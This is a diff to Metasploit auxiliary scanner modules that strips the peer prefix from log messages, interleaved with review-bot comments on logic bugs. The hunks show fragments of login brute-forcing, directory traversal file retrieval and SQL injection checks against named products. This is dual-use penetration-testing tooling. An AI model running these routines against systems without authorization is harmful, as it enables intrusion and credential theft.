diff --git a/modules/auxiliary/scanner/http/pocketpad_login.rb b/modules/auxiliary/scanner/http/pocketpad_login.rb index 8aed527ef6..f1107f89a4 100644 --- a/modules/auxiliary/scanner/http/pocketpad_login.rb +++ b/modules/auxiliary/scanner/http/pocketpad_login.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login bruteforce...") + print_status("Starting login bruteforce...") each_user_pass do |user, pass| do_login(user, pass) end @@ -50,15 +50,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return false end if res && res.code == 200 && res.headers['Server'] && res.headers['Server'].include?("Smeagol") && res.body.include?("PocketPAD") - vprint_good("#{peer} - Running PocketPAD application ...") + vprint_good("Running PocketPAD application ...") return true else - vprint_error("#{peer} - Application is not PocketPAD. Module will not continue.") + vprint_error("Application is not PocketPAD. Module will not continue.") return false end end @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { 
@@ -107,12 +107,12 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return :abort end if (res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("Smeagol")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred( ip: rhost, port: rport, @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end end diff --git a/modules/auxiliary/scanner/http/radware_appdirector_enum.rb b/modules/auxiliary/scanner/http/radware_appdirector_enum.rb index 8cf4fdc12f..abcb16ce3f 100644 --- a/modules/auxiliary/scanner/http/radware_appdirector_enum.rb +++ b/modules/auxiliary/scanner/http/radware_appdirector_enum.rb @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login brute force...") + print_status("Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end 
@@ -63,15 +63,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed, Aborting") + vprint_error("HTTP Connection Failed, Aborting") return false end if (res and res.headers['Server'] and res.headers['Server'].include?("Radware-web-server")) - vprint_good("#{peer} - Running Radware portal...") + vprint_good("Running Radware portal...") return true else - vprint_error("#{peer} - Application is not Radware. Module will not continue.") + vprint_error("Application is not Radware. Module will not continue.") return false end end @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { @@ -116,12 +116,12 @@ class Metasploit3 < Msf::Auxiliary 'authorization' => basic_auth(user,pass) }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed, Aborting") + vprint_error("HTTP Connection Failed, Aborting") return :abort end if (res and res.code == 302 and res.headers['Location'].include?('redirectId')) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred( ip: rhost, port: rport, @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end diff --git a/modules/auxiliary/scanner/http/rips_traversal.rb b/modules/auxiliary/scanner/http/rips_traversal.rb index 2cc3915992..2b42cb8c54 100644 
--- a/modules/auxiliary/scanner/http/rips_traversal.rb +++ b/modules/auxiliary/scanner/http/rips_traversal.rb @@ -73,9 +73,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded") + print_error("Nothing was downloaded") end end end diff --git a/modules/auxiliary/scanner/http/s40_traversal.rb b/modules/auxiliary/scanner/http/s40_traversal.rb index 3cea0a550b..49fa51058f 100644 --- a/modules/auxiliary/scanner/http/s40_traversal.rb +++ b/modules/auxiliary/scanner/http/s40_traversal.rb @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary t = "/.." * datastore['DEPTH'] - vprint_status("#{peer} - Retrieving #{datastore['FILE']}") + vprint_status("Retrieving #{datastore['FILE']}") # No permission to access.log or proc/self/environ, so this is all we do :-/ uri = normalize_uri(uri, 'index.php') @@ -58,13 +58,13 @@ class Metasploit3 < Msf::Auxiliary }) if not res - vprint_error("#{peer} - Server timed out") + vprint_error("Server timed out") elsif res and res.body =~ /Error 404 requested page cannot be found/ - vprint_error("#{peer} - Either the file doesn't exist, or you don't have the permission to get it") + vprint_error("Either the file doesn't exist, or you don't have the permission to get it") else # We don't save the body by default, because there's also other junk in it. # But we still have a SAVE option just in case - print_good("#{peer} - #{datastore['FILE']} retrieved") + print_good("#{datastore['FILE']} retrieved") vprint_line(res.body) if datastore['SAVE'] @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary res.body, ::File.basename(datastore['FILE']) ) - print_good("#{peer} - File saved as: #{p}") + print_good("File saved as: #{p}") end end end diff --git a/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb b/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb index f3f7d1d534..64f8ba1137 100644 
--- a/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb +++ b/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary filename = datastore['FILE'] filename = filename[1, filename.length] if filename =~ /^\// - vprint_status("#{peer} - Retrieving file #{datastore['FILE']}") + vprint_status("Retrieving file #{datastore['FILE']}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "workorder", "FileDownload.jsp"), @@ -61,9 +61,9 @@ class Metasploit3 < Msf::Auxiliary # The "Loding domain list To login AD authentication or local Authentication" string is returned in the response on a fixed version (build 9111) if res && res.code == 200 if res.body =~ /The File was not found/ - vprint_error("#{peer} - Vulnerable server, but the file does not exist!") + vprint_error("Vulnerable server, but the file does not exist!") elsif res.body =~ /Loding domain list To login AD authentication or local Authentication/ - vprint_error("#{peer} - The installed version of ManageEngine ServiceDesk Plus is not vulnerable!") + vprint_error("The installed version of ManageEngine ServiceDesk Plus is not vulnerable!") else p = store_loot( 'manageengine.servicedeskplus', @@ -72,10 +72,10 @@ class Metasploit3 < Msf::Auxiliary res.body, filename ) - print_good("#{peer} - File saved in: #{p}") + print_good("File saved in: #{p}") end else - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") end end end diff --git a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb index 093251a16e..c7f90ebff3 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb 
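Review bot: `vprint_error("Connection timed out")` in the `@@ -72,10` hunk of servicedesk_plus_traversal.rb is the `else` of `if res && res.code == 200` from the `@@ -61,9` hunk, so it is also printed when the server answers with any other status. An operator reading the log cannot tell an unreachable host from one that returned, say, a 403 or 500. `vprint_error(res ? "Unexpected HTTP #{res.code} response" : "Connection timed out")` separates the two cases. The method begins outside these hunks.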
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary res.body.to_s, 'IPMIdevicedesc.xml' ) - print_good("#{peer} - Stored the device description XML in #{path}") + print_good("Stored the device description XML in #{path}") return true else return false @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless is_supermicro? - vprint_error("#{peer} - This does not appear to be a Supermicro IPMI controller") + vprint_error("This does not appear to be a Supermicro IPMI controller") return end @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Auxiliary next unless res unless res.code == 200 && res.body.length > 0 - vprint_status("#{peer} - Request for #{uri} resulted in #{res.code}") + vprint_status("Request for #{uri} resulted in #{res.code}") next end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary res.body.to_s, uri.split('/').last ) - print_good("#{peer} - Password data from #{uri} stored to #{path}") + print_good("Password data from #{uri} stored to #{path}") end end diff --git a/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb b/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb index 206f7f416f..26cd5777e9 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb 
@@ -119,18 +119,18 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - vprint_status("#{peer} - Checking if it's a Supermicro IPMI web interface...") + vprint_status("Checking if it's a Supermicro IPMI web interface...") if is_supermicro? - vprint_good("#{peer} - Supermicro IPMI web interface found") + vprint_good("Supermicro IPMI web interface found") else - vprint_error("#{peer} - Supermicro IPMI web interface not found") + vprint_error("Supermicro IPMI web interface not found") return end - vprint_status("#{peer} - Checking CVE-2013-3621 (login.gi Buffer Overflow) ...") + vprint_status("Checking CVE-2013-3621 (login.gi Buffer Overflow) ...") result = check_login if result - print_good("#{peer} - Vulnerable to CVE-2013-3621 (login.cgi Buffer Overflow)") + print_good("Vulnerable to CVE-2013-3621 (login.cgi Buffer Overflow)") report_vuln({ :host => rhost, :port => rport, @@ -140,10 +140,10 @@ class Metasploit3 < Msf::Auxiliary }) end - vprint_status("#{peer} - Checking CVE-2013-3623 (close_window.gi Buffer Overflow) ...") + vprint_status("Checking CVE-2013-3623 (close_window.gi Buffer Overflow) ...") result = check_close_window if result - print_good("#{peer} - Vulnerable to CVE-2013-3623 (close_window.cgi Buffer Overflow)") + print_good("Vulnerable to CVE-2013-3623 (close_window.cgi Buffer Overflow)") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb index d7873f017b..b7a87ad514 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary travs << "../" * datastore['DEPTH'] travs << file - print_status("#{peer} - Retrieving file contents...") + print_status("Retrieving file contents...") res = send_request_cgi({ "uri" => "/cgi/url_redirect.cgi", 
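Review bot: The status message in the `@@ -119,18` hunk of smt_ipmi_cgi_scanner.rb names the endpoint as `login.gi`, while the `print_good` a few lines later says `login.cgi`. The `@@ -140,10` hunk has the same mismatch between `close_window.gi` and `close_window.cgi`. Since these lines are being rewritten anyway, the status strings should read `"Checking CVE-2013-3621 (login.cgi Buffer Overflow) ..."` and `"Checking CVE-2013-3623 (close_window.cgi Buffer Overflow) ..."` so log searches on the endpoint name match both messages.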
@@ -111,26 +111,26 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - print_status("#{peer} - Checking if it's a #{APP_NAME}....") + print_status("Checking if it's a #{APP_NAME}....") if is_supermicro? - print_good("#{peer} - Check successful") + print_good("Check successful") else - print_error("#{peer} - #{APP_NAME} not found") + print_error("#{APP_NAME} not found") return end - print_status("#{peer} - Login into the #{APP_NAME}...") + print_status("Login into the #{APP_NAME}...") session = login if session.nil? - print_error("#{peer} - Failed to login, check credentials.") + print_error("Failed to login, check credentials.") return else - print_good("#{peer} - Login successful, session: #{session}") + print_good("Login successful, session: #{session}") end contents = read_file(datastore['FILEPATH'], session) if contents.nil? - print_error("#{peer} - File not downloaded") + print_error("File not downloaded") return end @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Auxiliary contents, file_name ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") end end diff --git a/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb index ad2a235717..015e81013f 100644 --- a/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary uri = target_uri.path peer = "#{ip}:#{rport}" - vprint_status("#{peer} - Retrieving cookie") + vprint_status("Retrieving cookie") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "") 
@@ -57,10 +57,10 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 session = res.get_cookies else - vprint_error("#{peer} - Server returned #{res.code.to_s}") + vprint_error("Server returned #{res.code.to_s}") end - vprint_status("#{peer} - Logging in as user [ #{datastore['USER']} ]") + vprint_status("Logging in as user [ #{datastore['USER']} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "j_security_check"), @@ -76,14 +76,14 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 302 - vprint_status("#{peer} - Login succesful") + vprint_status("Login succesful") else - vprint_error("#{peer} - Login was not succesful!") + vprint_error("Login was not succesful!") return end randomname = Rex::Text.rand_text_alphanumeric(10) - vprint_status("#{peer} - Creating ticket with our requested file [ #{datastore['FILE']} ] as attachment") + vprint_status("Creating ticket with our requested file [ #{datastore['FILE']} ] as attachment") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "WorkOrder.do"), 
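Review bot: `vprint_error("Server returned #{res.code.to_s}")` in the `@@ -57,10` hunk of support_center_plus_directory_traversal.rb sits in the `else` of `if res and res.code == 200`, so it also runs when `res` is nil and then raises NoMethodError. `vprint_error(res ? "Server returned #{res.code}" : "No response from server")` handles both cases. The same message is rewritten in the `@@ -151,9` hunk, where the guarding condition is outside the hunk and should be checked the same way. The first branch also has no `return`, so the login request that follows is sent without a session cookie; whether that is intended is not visible here.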
@@ -114,21 +114,21 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 - vprint_status("#{peer} - Ticket created") + vprint_status("Ticket created") if (res.body =~ /FileDownload.jsp\?module=Request\&ID=(\d+)\&authKey=(.*)\" class=/) fileid = $1 - vprint_status("#{peer} - File ID is [ #{fileid} ]") + vprint_status("File ID is [ #{fileid} ]") fileauthkey = $2 - vprint_status("#{peer} - Auth Key is [ #{fileauthkey} ]") + vprint_status("Auth Key is [ #{fileauthkey} ]") else - vprint_error("#{peer} - File ID and AuthKey not found!") + vprint_error("File ID and AuthKey not found!") end else - vprint_error("#{peer} - Ticket not created due to error!") + vprint_error("Ticket not created due to error!") return end - vprint_status("#{peer} - Requesting file [ #{uri}workorder/FileDownload.jsp?module=Request&ID=#{fileid}&authKey=#{fileauthkey} ]") + vprint_status("Requesting file [ #{uri}workorder/FileDownload.jsp?module=Request&ID=#{fileid}&authKey=#{fileauthkey} ]") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "workorder", "FileDownload.jsp"), @@ -151,9 +151,9 @@ class Metasploit3 < Msf::Auxiliary data, datastore['FILE'] ) - print_good("#{peer} - [ #{datastore['FILE']} ] loot stored as [ #{p} ]") + print_good("[ #{datastore['FILE']} ] loot stored as [ #{p} ]") else - vprint_error("#{peer} - Server returned #{res.code.to_s}") + vprint_error("Server returned #{res.code.to_s}") end end end diff --git a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb index 82b8f3d7f4..ede1e33c3c 100644 --- a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb +++ b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb 
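Review bot: The branch that prints "File ID and AuthKey not found!" in the `@@ -114,21` hunk of support_center_plus_directory_traversal.rb does not return, unlike the "Ticket not created due to error!" branch just below it. Execution falls through to the download request with `fileid` and `fileauthkey` unset, and the following `vprint_status` interpolates the empty values into the URL it logs. Adding `return` after that `vprint_error` matches the other failure paths. The method continues outside the hunk.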
@@ -111,10 +111,10 @@ class Metasploit3 < Msf::Auxiliary }) if not res - print_error("#{peer} - Unable to download the file. The server timed out.") + print_error("Unable to download the file. The server timed out.") return elsif res and res.body.empty? - print_error("#{peer} - File not found or empty.") + print_error("File not found or empty.") return end @@ -123,24 +123,24 @@ class Metasploit3 < Msf::Auxiliary f = ::File.basename(fname) p = store_loot('symantec.brightmail.file', 'application/octet-stream', rhost, res.body, f) - print_good("#{peer} - File saved as: '#{p}'") + print_good("File saved as: '#{p}'") end def run_host(ip) sid, last_login = get_login_data if sid.empty? or last_login.empty? - print_error("#{peer} - Missing required login data. Cannot continue.") + print_error("Missing required login data. Cannot continue.") return end username = datastore['USERNAME'] password = datastore['PASSWORD'] if not auth(username, password, sid, last_login) - print_error("#{peer} - Unable to login. Cannot continue.") + print_error("Unable to login. Cannot continue.") return else - print_good("#{peer} - Logged in as '#{username}:#{password}'") + print_good("Logged in as '#{username}:#{password}'") end fname = datastore['FILENAME'] diff --git a/modules/auxiliary/scanner/http/typo3_bruteforce.rb b/modules/auxiliary/scanner/http/typo3_bruteforce.rb index c94347a9f9..46fc088080 100644 --- a/modules/auxiliary/scanner/http/typo3_bruteforce.rb +++ b/modules/auxiliary/scanner/http/typo3_bruteforce.rb @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - print_status("#{peer} - Trying to bruteforce login") + print_status("Trying to bruteforce login") res = send_request_cgi({ 'method' => 'GET', 
@@ -67,10 +67,10 @@ class Metasploit3 < Msf::Auxiliary end def try_login(user, pass) - vprint_status("#{peer} - Trying username:'#{user}' password: '#{pass}'") + vprint_status("Trying username:'#{user}' password: '#{pass}'") cookie = typo3_backend_login(user, pass) if cookie - print_good("#{peer} - Successful login '#{user}' password: '#{pass}'") + print_good("Successful login '#{user}' password: '#{pass}'") report_cred( ip: rhost, port: rport, @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - failed to login as '#{user}' password: '#{pass}'") + vprint_error("failed to login as '#{user}' password: '#{pass}'") return end end diff --git a/modules/auxiliary/scanner/http/vcms_login.rb b/modules/auxiliary/scanner/http/vcms_login.rb index 5c14785e1e..329ad2b77f 100644 --- a/modules/auxiliary/scanner/http/vcms_login.rb +++ b/modules/auxiliary/scanner/http/vcms_login.rb @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary begin sid = get_sid if sid.nil? - vprint_error("#{peer} - Failed to get sid") + vprint_error("Failed to get sid") return :abort end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary 'cookie' => sid }) rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT - vprint_error("#{peer} - Service failed to respond") + vprint_error("Service failed to respond") return :abort end @@ -117,9 +117,9 @@ class Metasploit3 < Msf::Auxiliary when /User name already confirmed/ return :skip_user when /Invalid password/ - vprint_status("#{peer} - Username found: #{user}") + vprint_status("Username found: #{user}") when /\<a href="process\.php\?logout=1"\>/ - print_good("#{peer} - Successful login: \"#{user}:#{pass}\"") + print_good("Successful login: \"#{user}:#{pass}\"") report_cred(ip: rhost, port: rport, user:user, password: pass, proof: res.body) return :next_user end 
@@ -137,7 +137,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) each_user_pass { |user, pass| - vprint_status("#{peer} - Trying \"#{user}:#{pass}\"") + vprint_status("Trying \"#{user}:#{pass}\"") do_login(user, pass) } end diff --git a/modules/auxiliary/scanner/http/wildfly_traversal.rb b/modules/auxiliary/scanner/http/wildfly_traversal.rb index cf05c0858a..6486a74948 100644 --- a/modules/auxiliary/scanner/http/wildfly_traversal.rb +++ b/modules/auxiliary/scanner/http/wildfly_traversal.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Attempting to download: #{datastore['RELATIVE_FILE_PATH']}") + vprint_status("Attempting to download: #{datastore['RELATIVE_FILE_PATH']}") traversal = "..\\" * datastore['TRAVERSAL_DEPTH'] res = send_request_raw({ @@ -62,9 +62,9 @@ class Metasploit3 < Msf::Auxiliary res.body, fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - vprint_error("#{peer} - Nothing was downloaded") + vprint_error("Nothing was downloaded") end end end diff --git a/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb b/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb index 12e6ed9e4a..a9ae93a81b 100644 --- a/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb +++ b/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb @@ -42,7 +42,7 @@ class Metasploit4 < Msf::Auxiliary left_marker = Rex::Text.rand_text_alpha(5) flag = Rex::Text.rand_text_alpha(5) - vprint_status("#{peer} - Checking host") + vprint_status("Checking host") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/'), 
@@ -55,14 +55,14 @@ class Metasploit4 < Msf::Auxiliary }) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way") + vprint_error("Server did not respond in an expected way") return end result = res.body =~ /#{left_marker}#{flag}#{right_marker}/ if result - print_good("#{peer} - Vulnerable to unauthenticated SQL injection within CP Multi-View Calendar 1.1.4 for Wordpress") + print_good("Vulnerable to unauthenticated SQL injection within CP Multi-View Calendar 1.1.4 for Wordpress") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb index 1584fd9278..9b804e4bb4 100644 --- a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb +++ b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb @@ -49,12 +49,12 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless wordpress_and_online? - print_error("#{peer} - Looks like this site is no WordPress blog") + print_error("Looks like this site is no WordPress blog") return end unless wordpress_xmlrpc_enabled? - print_error("#{peer} - XMLRPC interface is not enabled") + print_error("XMLRPC interface is not enabled") return end @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary ) if res.nil? || res.code == 500 - print_good("#{peer} - vulnerable to GHOST") + print_good("vulnerable to GHOST") report_vuln( :host => ip, :proto => 'tcp', @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary :sname => datastore['SSL'] ? "https" : "http" ) else - print_status("#{peer} - target not vulnerable to GHOST") + print_status("target not vulnerable to GHOST") end end diff --git a/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb b/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb index fb7097671a..b46c204c6f 100644 --- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb +++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb 
@@ -51,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary return :abort end - print_status("#{peer} - Starting XML-RPC login sweep...") + print_status("Starting XML-RPC login sweep...") cred_collection = Metasploit::Framework::CredentialCollection.new( blank_passwords: datastore['BLANK_PASSWORDS'], diff --git a/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb b/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb index 36448f4262..3892db3191 100644 --- a/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb +++ b/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb @@ -38,7 +38,7 @@ class Metasploit4 < Msf::Auxiliary left_marker = Rex::Text.rand_text_alpha(5) flag = Rex::Text.rand_text_alpha(5) - vprint_status("#{peer} - Checking host") + vprint_status("Checking host") res = send_request_cgi({ 'uri' => wordpress_url_admin_ajax, @@ -49,14 +49,14 @@ class Metasploit4 < Msf::Auxiliary } }) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way") + vprint_error("Server did not respond in an expected way") return end result = res.body =~ /#{left_marker}#{flag}#{right_marker}/ if result - print_good("#{peer} - Vulnerable to unauthenticated SQL injection within Contus Video Gallery 2.7 for Wordpress") + print_good("Vulnerable to unauthenticated SQL injection within Contus Video Gallery 2.7 for Wordpress") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb b/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb index 507b311f36..11c29161d2 100644 --- a/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb 
@@ -74,9 +74,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.") + print_error("Nothing was downloaded. You can try to change the DEPTH parameter.") end end end diff --git a/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb b/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb index 58f70a893b..d4384810b1 100644 --- a/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb @@ -69,9 +69,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - vprint_error("#{peer} - Nothing was downloaded. Check the path and the traversal parameters.") + vprint_error("Nothing was downloaded. Check the path and the traversal parameters.") end end end diff --git a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb index 6c8259c09f..1f9046447c 100644 --- a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb +++ b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary ) temp = JSON.parse(res.body.gsub(/exportarticle\(/, "").gsub(/\)/, "")) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, JSON::ParserError => e - print_error("#{peer} - The following Error was encountered: #{e.class}") + print_error("The following Error was encountered: #{e.class}") return end 
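Review bot: In the wp_mobile_pack_info_disclosure.rb hunk (`@@ -57,7`), `res.body` is dereferenced inside the protected block, but the `rescue` list covers only connection and JSON parse errors. A nil `res`, presumably what the request helper returns on a timeout, would therefore surface as an unhandled NoMethodError. A guard such as `return unless res && res.body` before the `JSON.parse` line would let the scan continue past unresponsive hosts. The error message prints only `e.class`; adding `e.message` would make failures easier to diagnose. The `begin` of this block is outside the hunk.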
@@ -77,9 +77,9 @@ class Metasploit3 < Msf::Auxiliary ip, res_clean ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try checking the POSTID parameter.") + print_error("Nothing was downloaded. You can try checking the POSTID parameter.") end end end diff --git a/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb b/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb index ca60253e0c..88f9ca2081 100644 --- a/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb @@ -72,9 +72,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.") + print_error("Nothing was downloaded. You can try to change the DEPTH parameter.") end end end diff --git a/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb b/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb index accb58a7f7..51404cbbd1 100644 --- a/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.redirect? && res.redirection location = res.redirection - print_status("#{peer} - Following redirect to #{location}") + print_status("Following redirect to #{location}") res = send_request_cgi( 'uri' => location, 'method' => 'GET', 
